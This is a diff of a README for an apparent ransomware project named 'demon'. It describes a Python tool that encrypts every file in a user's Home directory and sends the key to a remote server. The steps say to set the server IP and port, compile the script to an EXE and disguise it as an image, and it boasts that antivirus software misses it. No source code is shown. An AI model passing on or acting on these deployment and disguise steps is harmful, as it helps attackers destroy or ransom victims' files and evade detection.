jade01win/demon/README.md

 # demon
 fuck these demons, I am so triggered.

-Encrypts every file in your Home.
+Encrypts every file in your Home and sends the key to a remote server

 ***

-0. Works on both Windows and Linux.
+## Works on both Windows and Linux.

+1. Put the remote server IP and port in "demon.py".
-1. Run server > run demon.py
+2. Run server > run python demon.py -p <port>

-2. Compile demon.py to EXE, make it a nice image or some shit and brick your Windows.
+3. Compile demon.py to EXE, make it a nice image or some shit and brick your Windows.

-3. Anti-virusses don't give a damn.
+4. Anti-virusses don't give a damn.

 ***

-Maybe Ill add a decrypter someday also.
+Maybe I'll add a decrypter someday also.